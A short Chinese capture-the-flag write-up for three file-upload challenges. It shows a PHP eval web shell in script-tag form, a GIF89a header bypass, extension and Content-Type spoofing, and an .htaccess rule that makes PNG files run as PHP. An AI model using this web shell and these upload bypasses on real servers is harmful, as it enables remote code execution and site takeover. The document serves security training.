[极客大挑战 2019]Upload
打开环境,是上传一句话木马的题
先上传1.php试试,发现不可以
试试改后缀为phtml,提示语句中不能包含<?,只能改木马:
<script language="php">eval($_POST['line']);</script>还是报错没有图片
传一个真正的不含<?的图片马(还是报错)
想到用文件头GIF89a绕过,bp抓包修改,终于上传成功
在文件内容的起始位置加上一个GIF89a,文件就会被认为是一个图片。
连接蚁剑,注意修改路径(一般为upload/文件名)
在根目录得flag
[ACTF2020 新生赛]Upload
文件上传一句话木马
试试1.php,弹窗提示
抓包修改Type为jpg图片,文件后缀名可用.pht
上传成功,得到路径
连接蚁剑,得到flag。
[MRCTF2020]你传你🐎呢
上传1.php文件
bp抓包后,尝试多种绕过方式都不行
(1)发现可以用路径拼接绕过
(2)偶然上传了代码如下的png文件,发现也能上传成功
<script language="php">eval($_POST['line']);</script>
使用.htaccess文件将png解析为php
格式:application/octet-stream
SetHandler application/x-httpd-php .png //.htaccess文件内容
连接蚁剑,在根目录下得到flag
